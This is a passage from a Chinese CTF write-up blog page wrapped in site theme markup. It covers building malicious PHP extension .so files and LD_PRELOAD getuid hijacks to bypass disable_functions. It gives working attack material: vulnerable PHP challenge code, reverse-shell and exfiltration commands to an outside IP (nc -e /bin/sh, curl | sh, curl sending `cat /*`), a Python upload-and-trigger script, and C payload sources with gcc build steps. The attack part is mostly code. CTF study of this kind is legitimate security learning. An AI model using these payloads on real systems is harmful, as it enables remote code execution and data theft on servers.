<!DOCTYPE html>
<html>
  <!-- meta/link... -->
  



<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <!-- Global site tag (gtag.js) - Google Analytics -->


  <title>花式构造恶意so文件 | Sakura501</title>

  <link rel="icon" type="image/x-icon, image/vnd.microsoft.icon" href="/kkk.ico">
  <link rel="stylesheet" href="https://at.alicdn.com/t/font_1911880_c1nvbyezg17.css">
  <link href="https://cdn.jsdelivr.net/gh/inkss/fontawesome@5.15.3/css/all.min.css" rel="stylesheet">
  <link href="/js/swiper/swiper@5.4.1.min.css" rel="stylesheet">
  
  
    <script>
        var themeModelId = '5';
        if (themeModelId) {
            localStorage.setItem('modelId', themeModelId);
        }
    </script>
    
    <script src="https://cdn.jsdelivr.net/gh/yuang01/live2d-widget@latest/autoload.js"></script>
    <script>
        var live2dOpen = eval('true') || false;
        if (!live2dOpen) {
            localStorage.setItem('waifu-display', 1609323474481);
        }
    </script>
  
  
  
<link rel="stylesheet" href="/css/animate.min.css">

  
<link rel="stylesheet" href="/css/style.css">

  
  
    
<link rel="stylesheet" href="/js/fancybox/jquery.fancybox.min.css">

  
  
    
<link rel="stylesheet" href="/js/shareJs/share.min.css">

  
  <style>
        @media (max-width: 992px) {
            #waifu {
                display: none;
            }
        }
    </style>
    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">

    
        <script src="/js/valine/av-min@3.0.4.js"></script>
        <script src="https://cdn.jsdelivr.net/gh/HCLonely/Valine@latest/dist/Valine.min.js"></script>
    

    <!-- import link -->
    
        
            
        
            
        
    
    <!-- import script -->
    
        
            
        
            
        
    

<meta name="generator" content="Hexo 6.1.0"><link rel="alternate" href="/atom.xml" title="Sakura501" type="application/atom+xml">
</head>

  
  <!-- 依赖于jquery和vue -->
  
    
<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>

  

  
    
<script src="https://cdn.jsdelivr.net/npm/vue@2.6.11/dist/vue.min.js"></script>

  
  
  <body>
    <!-- 预加载动画 -->
    <!-- 页面预加载动画 -->

<div id='loader'>
  <link rel="stylesheet" href="/js/loaded/index.css" >
  <div class="loading-left-bg"></div>
  <div class="loading-right-bg"></div>
  <div class="spinner-box">
    <div class="configure-border-1">
      <div class="configure-core"></div>
    </div>
    <div class="configure-border-2">
      <div class="configure-core"></div>
    </div>
    <div class="loading-word">加载中...</div>
  </div>
</div>

<script>
  var endLoading = function () {
    document.body.style.overflow = 'auto';
    document.getElementById('loader').classList.add("loading");
  }
  window.addEventListener('DOMContentLoaded',endLoading);
  
</script>

    
    <!-- 判断是否为暗黑风格 -->
    <!-- 判断是否为黑夜模式 -->
<script>
  let isDark = JSON.parse(localStorage.getItem('dark')) || JSON.parse('false');

  if (isDark) {
    $(document.body).addClass('darkModel');
  }
</script>

    <!-- 需要在上面加载的js -->
    <script>
  function loadScript(src, cb) {
    return new Promise(resolve => {
      setTimeout(function () {
        var HEAD = document.getElementsByTagName("head")[0] || document.documentElement;
        var script = document.createElement("script");
        script.setAttribute("type", "text/javascript");
        if (cb) {
          if (JSON.stringify(cb)) {
            for (let p in cb) {
              if (p == "onload") {
                script[p] = () => {
                  cb[p]()
                  resolve()
                }
              } else {
                script[p] = cb[p]
                script.onload = resolve
              }
            }
          } else {
            script.onload = () => {
              cb()
              resolve()
            };
          }
        } else {
          script.onload = resolve
        }
        script.setAttribute("src", src);
        HEAD.appendChild(script);
      });
    });
  }

  //https://github.com/filamentgroup/loadCSS
  var loadCSS = function (href, before, media, attributes) {
    return new Promise(resolve => {
      setTimeout(function () {
        var link = document.createElement('link');
        link.rel = "stylesheet";
        link.href = src;
        link.onload = resolve;
        document.getElementsByTagName("head")[0].appendChild(link);
      });
    });
  };

</script> 

<!-- 轮播图所需要的js -->
<script src="/js/swiper/swiper.min.js"></script>
<script src="/js/swiper/vue-awesome-swiper.js"></script>
<script src="/js/swiper/swiper.animate1.0.3.min.js"></script>

<script type="text/javascript">
  Vue.use(window.VueAwesomeSwiper)
</script>


  <script src="/js/vue-typed-js/index.js"></script>


<!-- 首页的公告滚动插件的js需要重新加载 -->
<script src="/js/vue-seamless-scroll/index.js"></script>

<!-- 打字机效果js -->
<script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11"></script>


    <div id="safearea">
      <main class="main" id="pjax-container">
        <!-- 头部导航 -->
        
<header class="header   " 
  id="navHeader"
  style="position: fixed;
  left: 0; top: 0; z-index: 10;width: 100%;"
>
  <div class="header-content">
    <div class="bars">
      <div id="appDrawer" class="sidebar-image">
  <div class="drawer-box-icon">
    <i class="fas fa-bars" aria-hidden="true" @click="showDialogDrawer"></i>
  </div>
  
  <transition name="fade">
    <div class="drawer-box_mask" v-cloak style="display: none;" v-show="visible" @click.self="cancelDialogDrawer">
    </div>
  </transition>
  <div class="drawer-box" :class="{'active': visible}">
    <div class="drawer-box-head bg-color">
      <img class="drawer-box-head_logo lazyload placeholder" src="/medias/kkk.jpg" class="lazyload placeholder" data-srcset="/medias/kkk.jpg" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg" alt="logo">
      <h3 class="drawer-box-head_title">Sakura501</h3>
      <h5 class="drawer-box-head_desc">兴趣使然的个人小站</h5>
    </div>
    
    <div class="drawer-box-content">
      <ul class="drawer-box-content_menu">
        
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/" class="drawer-menu-item-link">
                  
                    <i class="fas fa-home" aria-hidden="true"></i>
                  
                  <span class="name">首页</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/archives" class="drawer-menu-item-link">
                  
                    <i class="fas fa-archive" aria-hidden="true"></i>
                  
                  <span class="name">归档</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/tags" class="drawer-menu-item-link">
                  
                    <i class="fas fa-tags" aria-hidden="true"></i>
                  
                  <span class="name">标签</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/categories" class="drawer-menu-item-link">
                  
                    <i class="fas fa-bookmark" aria-hidden="true"></i>
                  
                  <span class="name">分类</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/about" class="drawer-menu-item-link">
                  
                    <i class="fas fa-user" aria-hidden="true"></i>
                  
                  <span class="name">关于</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/friends" class="drawer-menu-item-link">
                  
                    <i class="fas fa-users" aria-hidden="true"></i>
                  
                  <span class="name">友情链接</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/kpop" class="drawer-menu-item-link">
                  
                    <i class="fas fa-music" aria-hidden="true"></i>
                  
                  <span class="name">Kpop</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/cure" class="drawer-menu-item-link">
                  
                    <i class="fas fa-list-alt" aria-hidden="true"></i>
                  
                  <span class="name">好句</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="javascript:;" class="drawer-menu-item-link has-children" @click="openOrCloseMenu(8)">
                  <span>
                    
                      <i class="fas fa-link"></i>
                    
                    <span class="name">更多</span>
                  </span>
                  <i class="fas fa-chevron-left arrow " :class="{'icon-rotate': isOpen(8)}" aria-hidden="true"></i>
                </a>
                <ul class="drawer-sub-menu" v-if="isOpen(8)">
                  
                  <li>
                    <a href="/gallery">
                      
                      <i class="fas fa-image" style="margin-top: -20px;"></i>
                      
                      <span>图库</span>
                    </a>
                  </li>
                  
                  <li>
                    <a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_51326092?type=blog">
                      
                      <i class="fas fa-user" style="margin-top: -20px;"></i>
                      
                      <span>CSDN</span>
                    </a>
                  </li>
                  
                  <li>
                    <a href="/resource">
                      
                      <i class="fas fa-book" style="margin-top: -20px;"></i>
                      
                      <span>资源收录</span>
                    </a>
                  </li>
                  
                  <li>
                    <a target="_blank" rel="noopener" href="http://baidu.com">
                      
                      <i class="fas fa-search" style="margin-top: -20px;"></i>
                      
                      <span>百度</span>
                    </a>
                  </li>
                  
                </ul>
              
            </li>
          
        
        
          <li class="drawer-box-content_item">
            <a target="_blank" rel="noopener" href="https://github.com/Sakura-501">
              <i class="fas fa-github" aria-hidden="true"></i>
              <span>Github</span>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</div>

<script>
  var body = document.body || document.documentElement || window;
  var vm = new Vue({
    el: '#appDrawer',
    data: {
      visible: false,
      top: 0,
      openArr: [],
    },
    computed: {
    },
    mounted() {
    },
    methods: {
      isOpen(index) {
        if (this.openArr.includes(index)) {
          return true;
        } else {
          return false;
        }
      },
      openOrCloseMenu(curIndex) {
        const index = this.openArr.indexOf(curIndex);
        if (index !== -1) {
          this.openArr.splice(index, 1);
        } else {
          this.openArr.push(curIndex);
        }
      },
      showDialogDrawer() {
        this.visible = true;
        // 防止页面滚动，只能让弹框滚动
        this.top = $(document).scrollTop()
        body.style.cssText = 'width: 100%; height: 100%;overflow: hidden;';
      },
      cancelDialogDrawer() {
        this.visible = false;
        body.removeAttribute('style');
        $(document).scrollTop(this.top)
      }
    },
    created() {}
  })
</script>

    </div>
    <div class="blog-title" id="author-avatar">
      
        <div class="avatar">
          <img src="/medias/kkk.jpg" class="lazyload placeholder" data-srcset="/medias/kkk.jpg" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg" alt="logo">
        </div>
      
      <a href="/" class="logo">Sakura501</a>
    </div>
    <nav class="navbar">
      <ul class="menu">
        
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/" class="menu-item-link" title="首页">
                  
                    <i class="fas fa-home" aria-hidden="true"></i>
                  
                  <span class="name">首页</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/archives" class="menu-item-link" title="归档">
                  
                    <i class="fas fa-archive" aria-hidden="true"></i>
                  
                  <span class="name">归档</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/tags" class="menu-item-link" title="标签">
                  
                    <i class="fas fa-tags" aria-hidden="true"></i>
                  
                  <span class="name">标签</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/categories" class="menu-item-link" title="分类">
                  
                    <i class="fas fa-bookmark" aria-hidden="true"></i>
                  
                  <span class="name">分类</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/about" class="menu-item-link" title="关于">
                  
                    <i class="fas fa-user" aria-hidden="true"></i>
                  
                  <span class="name">关于</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/friends" class="menu-item-link" title="友链">
                  
                    <i class="fas fa-users" aria-hidden="true"></i>
                  
                  <span class="name">友链</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/kpop" class="menu-item-link" title="Kpop">
                  
                    <i class="fas fa-music" aria-hidden="true"></i>
                  
                  <span class="name">Kpop</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/cure" class="menu-item-link" title="好句">
                  
                    <i class="fas fa-list-alt" aria-hidden="true"></i>
                  
                  <span class="name">好句</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="javascript:;" class="menu-item-link" title="更多">
                  
                    <i class="fas fa-link"></i>
                  
                  <span class="name">更多</span>
                  <i class="fas fa-chevron-down arrow" aria-hidden="true"></i>
                </a>
                <ul class="sub-menu">
                  
                  <li>
                    <a href="/gallery">
                      
                      <i class="fas fa-image" style="margin-top: -20px;"></i>
                      
                      <span>图库</span>
                    </a>
                  </li>
                  
                  <li>
                    <a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_51326092?type=blog">
                      
                      <i class="fas fa-user" style="margin-top: -20px;"></i>
                      
                      <span>CSDN</span>
                    </a>
                  </li>
                  
                  <li>
                    <a href="/resource">
                      
                      <i class="fas fa-book" style="margin-top: -20px;"></i>
                      
                      <span>资源收录</span>
                    </a>
                  </li>
                  
                  <li>
                    <a target="_blank" rel="noopener" href="http://baidu.com">
                      
                      <i class="fas fa-search" style="margin-top: -20px;"></i>
                      
                      <span>百度</span>
                    </a>
                  </li>
                  
                </ul>
              
            </li>
          
        
      </ul>
      
      
        <div id="appSearch">
  <div class="search"  @click="showDialog()"><i class="fas fa-search" aria-hidden="true"></i></div>
  <transition name="fade">
    <div class="message-box_wrapper" style="display: none;" v-cloak v-show="dialogVisible" @click.self="cancelDialogVisible()">
      <div class="message-box animated bounceInDown">
        <h2>
          <span>
            <i class="fas fa-search" aria-hidden="true"></i>
            <span class="title">本地搜索</span>
          </span>
          <i class="fas fa-times close" pointer style="float:right;" aria-hidden="true" @click.self="cancelDialogVisible()"></i>
        </h2>
        <form class="site-search-form">
          <input type="text"
            placeholder="请输入关键字"
            id="local-search-input" 
            @click="getSearchFile()"
            class="st-search-input"
            v-model="searchInput"
          />
        </form>
        <div class="result-wrapper">
          <div id="local-search-result" class="local-search-result-cls"></div>
        </div>
      </div>
    </div>
  </transition>
</div>
<script src="/js/local_search.js"></script>
<script>
  var body = document.body || document.documentElement || window;
  var vm = new Vue({
    el: '#appSearch',
    data: {
      dialogVisible: false,
      searchInput: '',
      top: 0,
    },
    computed: {
    },
    mounted() {
      window.addEventListener('pjax:complete', () => {
        this.cancelDialogVisible();
      })
    },
    methods: {
      showDialog() {
        this.dialogVisible = true;
        // 防止页面滚动，只能让弹框滚动
        this.top = $(document).scrollTop()
        body.style.cssText = 'overflow: hidden;';
      },
      getSearchFile() {
        if (!this.searchInput) {
          getSearchFile("/search.xml");
        }
      },
      cancelDialogVisible() {
        this.dialogVisible = false;
        body.removeAttribute('style');
        $(document).scrollTop(this.top)
      },
    },
    created() {}
  })
</script>
<!-- 解决刷新页面闪烁问题，可以在元素上添加display: none, 或者用vue.extend方法，详情：https://blog.csdn.net/qq_31393401/article/details/81017912 -->
<!-- 下面是搜索基本写法 -->
<!-- <script type="text/javascript" id="local.search.active">
  var inputArea = document.querySelector("#local-search-input");
  inputArea.onclick   = function(){ getSearchFile(); this.onclick = null }
  inputArea.onkeydown = function(){ if(event.keyCode == 13) return false }
</script> -->

      

    </nav>
  </div>
  
    <a target="_blank" rel="noopener" href="https://github.com/Sakura-501" class="github-corner color-primary" aria-label="View source on GitHub"><svg width="60" height="60" viewBox="0 0 250 250" style="fill:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
  
  
    <div id="he-plugin-simple"></div>
    <script>
      WIDGET = {
        CONFIG: {
          "modules": "012",
          "background": 5,
          "tmpColor": "4A4A4A",
          "tmpSize": 16,
          "cityColor": "4A4A4A",
          "citySize": 16,
          "aqiSize": 16,
          "weatherIconSize": 24,
          "alertIconSize": 18,
          "padding": "10px 10px 10px 10px",
          "shadow": "1",
          "language": "auto",
          "borderRadius": 5,
          "fixed": "false",
          "vertical": "middle",
          "horizontal": "center",
          "key": "2784dd3fcb1e4f0f9a9b579bf69641f2"
        }
      }
    </script>
    <script src="https://widget.qweather.net/simple/static/js/he-simple-common.js?v=2.0"></script> 
    
</header>
        <!-- 内容区域 -->
        
 <!-- prismjs 代码高亮 -->
 
    
    <link href="/js/prism/prism-line-numbers.css" rel="stylesheet">
    
        <link href="/js/prism/prism-coy.min.css" rel="stylesheet">
    

    <style>
        pre[class*="language-"] {
            overflow-y: hidden;
        }
        .line-numbers .line-numbers-rows {
            border: none;
        }
    </style>
  


<div class="bg-dark-floor" style="position: fixed;left: 0;top: 0;width: 100%;height: 100%;z-index: -1;"></div>


  <!-- 文章详情页顶部图片和标题 -->




<div class="post-detail-header" id="thumbnail_canvas" style="background-repeat: no-repeat; background-size: cover; 
  background-position: center center;position: relative;background-image:url('/medias/1/7.jpg')">
  <div class="post-detail-header-mask"></div>
  <canvas id="header_canvas"style="position:absolute;bottom:0;pointer-events:none;"></canvas>
  
  <div class="post-detail-header_info-box">
    <div class="title-box">
      <span class="title">
        花式构造恶意so文件
      </span>
    </div>
    
    
      
        <span class="post-detail-header_date">
          <i class="fas fa-calendar"></i> 发表于：2022-04-28 |
        </span>
      

      
        <span class="post-detail-header_categories">
          <i class="iconfont iconbookmark1"></i> 分类：
          
            <a href="/categories/web/" class="post-detail-header_category">
              web
            </a>
          
        </span>
      

      
        <div class="post-detail-header_wordcount">
          <span class="totalcount">
            <i class="fas fa-file-text-o"></i> 字数统计: 5.4k |
          </span>
  
          <span class="min2read">
            <i class="fas fa-clock"></i> 阅读时长: 24分钟 |
          </span>
  
          
            <span class="reading">
              <i class="fas fa-eye"></i> 阅读量：<span id="busuanzi_value_page_pv"></span>
            </span>
          
        </div>
      
    
  </div>
  
  
    <script src="/js/bubble/bubble.js"></script>
  
</div>





<div class="row justify-position" 
  style="padding-top: 0px;">
  <div class="main-content">
    <article class="post post-detail">
      <div class="post-content">
        <h3 id="劫持mysqli"><a href="#劫持mysqli" class="headerlink" title="劫持mysqli"></a>劫持mysqli</h3><h4 id="漏洞代码"><a href="#漏洞代码" class="headerlink" title="漏洞代码"></a>漏洞代码</h4><pre class="line-numbers language-none"><code class="language-none"> &lt;?php
error_reporting(0);
$action &#x3D; $_GET[&#39;a&#39;];
switch ($action) &#123;
    case &#39;phpinfo&#39;:
        phpinfo();
        break;
    case &#39;write&#39;:
        file_put_contents($_POST[&#39;file&#39;],$_POST[&#39;content&#39;]);
        break;
    case &#39;run&#39;:
        shell_exec(&quot;php -r &#39;ctfshow();&#39;&quot;);
        break;
    default:
        highlight_file(__FILE__);
        break;
&#125; <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>扩展目录</p>
<p><img src="/images/so/extension.png" class="lazyload placeholder" data-srcset="/images/so/extension.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<p>&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;extensions&#x2F;no-debug-non-zts-20180731</p>
<h4 id="条件分析"><a href="#条件分析" class="headerlink" title="条件分析"></a>条件分析</h4><p><img src="/images/so/condition.png" class="lazyload placeholder" data-srcset="/images/so/condition.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<h3 id="1-纯手动构造so"><a href="#1-纯手动构造so" class="headerlink" title="1 纯手动构造so"></a>1 纯手动构造so</h3><p>有时间再补充</p>
<h3 id="2-使用ext-skel"><a href="#2-使用ext-skel" class="headerlink" title="2 使用ext_skel"></a>2 使用ext_skel</h3><p>其中c文件有修改的地方</p>
<p><img src="/images/so/change.png" class="lazyload placeholder" data-srcset="/images/so/change.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<p>apt-get install 安装的php是没有ext_skel.php的,需要自己去下载源码包</p>
<p><img src="/images/so/ext_skel.png" class="lazyload placeholder" data-srcset="/images/so/ext_skel.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<pre class="line-numbers language-none"><code class="language-none">wget http:&#x2F;&#x2F;fi2.php.net&#x2F;get&#x2F;php-7.1.11.tar.gz&#x2F;from&#x2F;this&#x2F;mirror
tar -zxvf php-7.0.2.tar.gz
安装：
.&#x2F;configure --prefix&#x3D;&#x2F;usr&#x2F;local&#x2F;php
make
make install<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>





<p>首先生成一个假的mysqli扩展</p>
<pre class="line-numbers language-none"><code class="language-none">php ext_skel.php --ext mysqli --author w1nd --std
php ext_skel.php --ext ctfshow --author w1nd --std<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>进入该目录找到c文件在test1处加入反弹shell的代码</p>
<pre class="line-numbers language-none"><code class="language-none">nc 175.178.47.228 8888 -e &#x2F;bin&#x2F;sh
curl https:&#x2F;&#x2F;your-shell.com&#x2F;175.178.47.228:8888 | sh
curl http:&#x2F;&#x2F;175.178.47.228:8888&#x2F;?p&#x3D;&#96;cat &#x2F;*&#96;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>还有改变的地方</p>
<p><img src="/images/so/so-change.png" class="lazyload placeholder" data-srcset="/images/so/so-change.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<p>写出来先：</p>
<pre class="line-numbers language-none"><code class="language-none">第一个地方是PHP_FUNCTION函数那里写入自己需要执行的命令

第二个地方是下面这个:
static const zend_function_entry ctfshow_functions[] &#x3D; &#123;
        PHP_FE(ctfshow,         arginfo_mysqli_test1)
        PHP_FE(mysqli_test2,           arginfo_mysqli_test2)
        PHP_FE_END
&#125;;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后</p>
<pre class="line-numbers language-none"><code class="language-none">phpize
.&#x2F;configure --enable-mysqli
make
make install

特意说明，最好使用跟题目的同一版本，不同大版本之间有差异性，所以可能打不通。
例如下面的使用方式：
&#x2F;etc&#x2F;php&#x2F;8.0.9&#x2F;bin&#x2F;phpize       &#x2F;&#x2F;注意使用指定版本的phpize,如果使用过其他版本的phpize,记住清空旧版本的残余
.&#x2F;configure --with-php-config&#x3D;&#x2F;etc&#x2F;php&#x2F;8.0.9&#x2F;bin&#x2F;php-config    &#x2F;&#x2F;同样指定版本的php-config
make
sudo make install   &#x2F;&#x2F;安装到指定版本的so目录下<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后会告诉生成的so文件所在目录：</p>
<pre class="line-numbers language-none"><code class="language-none">Installing shared extensions:     &#x2F;usr&#x2F;lib&#x2F;php&#x2F;20210902&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>python脚本跑一下：</p>
<pre class="line-numbers language-none"><code class="language-none">import requests
  
url&#x3D;&quot;http:&#x2F;&#x2F;7d007399-e8e6-4dd9-947f-4ad7a8456559.challenge.ctf.show&#x2F;&quot;
sodata&#x3D;open(&quot;mysqli.so&quot;, &#39;rb&#39;).read()
# 扩展目录可以在phpinfo中看到
data &#x3D; &#123;
    &#39;file&#39;: &#39;&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;extensions&#x2F;no-debug-non-zts-20180731&#x2F;mysqli.so&#39;,
    &#39;content&#39;: sodata
&#125;
requests.post(url+&quot;?a&#x3D;write&quot;,data&#x3D;data)
requests.get(url+&quot;?a&#x3D;run&quot;)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h3 id="3-gcc"><a href="#3-gcc" class="headerlink" title="3 gcc"></a>3 gcc</h3><p>先写一个c文件</p>
<pre class="line-numbers language-none"><code class="language-none">#include&lt;stdlib.h&gt;
#include&lt;string.h&gt;
__attribute__((constructor))void payload()&#123;
	unserenv(&quot;LD_PRELOAD&quot;);
	const char* cmd &#x3D; getenv(&quot;CMD&quot;);
    system(cmd);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后直接gcc生成共享库</p>
<pre class="line-numbers language-none"><code class="language-none">gcc --shared -fPIC ctfshowBackdoor.c -o ctfshowBackdoor.so<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h3 id="利用LD-PRELOAD劫持getuid函数"><a href="#利用LD-PRELOAD劫持getuid函数" class="headerlink" title="利用LD_PRELOAD劫持getuid函数"></a>利用LD_PRELOAD劫持getuid函数</h3><p>上面的方法，需要重启或者命令行来执行php重载so文件，利用条件苛刻，所以我们需要寻找到不重启php-fpm的方法。</p>
<h4 id="漏洞代码-1"><a href="#漏洞代码-1" class="headerlink" title="漏洞代码"></a>漏洞代码</h4><pre class="line-numbers language-none"><code class="language-none"> &lt;?php
error_reporting(0);
$action &#x3D; $_GET[&#39;a&#39;];
switch ($action) &#123;
    case &#39;phpinfo&#39;:
        phpinfo();
        break;
    case &#39;write&#39;:
        file_put_contents($_POST[&#39;file&#39;],$_POST[&#39;content&#39;]);
        break;
    case &#39;run&#39;:
        putenv($_GET[&#39;env&#39;]);
        system(&quot;whoami&quot;);
        break;
    default:
        highlight_file(__FILE__);
        break;
&#125; <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>如果扩展目录不可写，且无法重启php-fpm，就需要使用到putenv函数来实现执行恶意so文件</p>
<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p><img src="/images/so/getuid.png" class="lazyload placeholder" data-srcset="/images/so/getuid.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<p>大概意思就是：php调用mail函数后，会调用linux下的&#x2F;usr&#x2F;bin&#x2F;sendemail，创建一个新的进程，建了新的进程就会调用getuid函数，所以只要我们通过设置继承LD_PRELOAD环境变量提前加载恶意的so文件，那么新建进程的时候就会执行恶意so文件中的getuid这个恶意的函数代码。</p>
<h4 id="想要利用LD-PRELOAD环境变量绕过disable-functions需要注意以下几点："><a href="#想要利用LD-PRELOAD环境变量绕过disable-functions需要注意以下几点：" class="headerlink" title="想要利用LD_PRELOAD环境变量绕过disable_functions需要注意以下几点："></a>想要利用LD_PRELOAD环境变量绕过disable_functions需要注意以下几点：</h4><blockquote>
<p>能够上传自己的.so文件</p>
<p>能够控制LD_PRELOAD环境变量的值，比如putenv()函数</p>
<p>因为新进程启动将加载LD_PRELOAD中的.so文件，所以要存在可以控制PHP启动外部程序的函数并能执行，比如mail()、imap_mail()、mb_send_mail()和error_log()函数等</p>
</blockquote>
<h4 id="getuid"><a href="#getuid" class="headerlink" title="getuid"></a>getuid</h4><p>函数原型：</p>
<p><img src="/images/so/getuid-function.png" class="lazyload placeholder" data-srcset="/images/so/getuid-function.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<p>重写后,第一种方式：</p>
<p><img src="/images/so/getuid-change.png" class="lazyload placeholder" data-srcset="/images/so/getuid-change.png" srcset="https://img2.baidu.com/it/u=2037979560,2772131037&fm=26&fmt=auto&gp=0.jpg"></p>
<p>也可以写成下面这种：</p>
<p>getuid.c</p>
<pre class="line-numbers language-none"><code class="language-none">#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
void payload()&#123;
        &#x2F;&#x2F;system(&quot;curl http:&#x2F;&#x2F;175.178.47.228:8888?s&#x3D;&#96;cat &#x2F;*&#96;&quot;);
        system(&quot;curl https:&#x2F;&#x2F;your-shell.com&#x2F;175.178.47.228:8888 | sh&quot;);
&#125;
int getuid()
&#123;
        if(getenv(&quot;LD_PRELOAD&quot;)&#x3D;&#x3D;NULL)&#123; return 0;&#125;
        unsetenv(&quot;LD_PRELOAD&quot;);
        payload();
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>使用下面语句gcc编译上面的c文件生成恶意so文件</p>
<pre class="line-numbers language-none"><code class="language-none">gcc -c -fPIC getuid.c -o getuid
gcc --share getuid -o getuid.so
或者
gcc -c -fPIC getuid.c -o getuid&amp;&amp;gcc --share getuid -o getuid.so
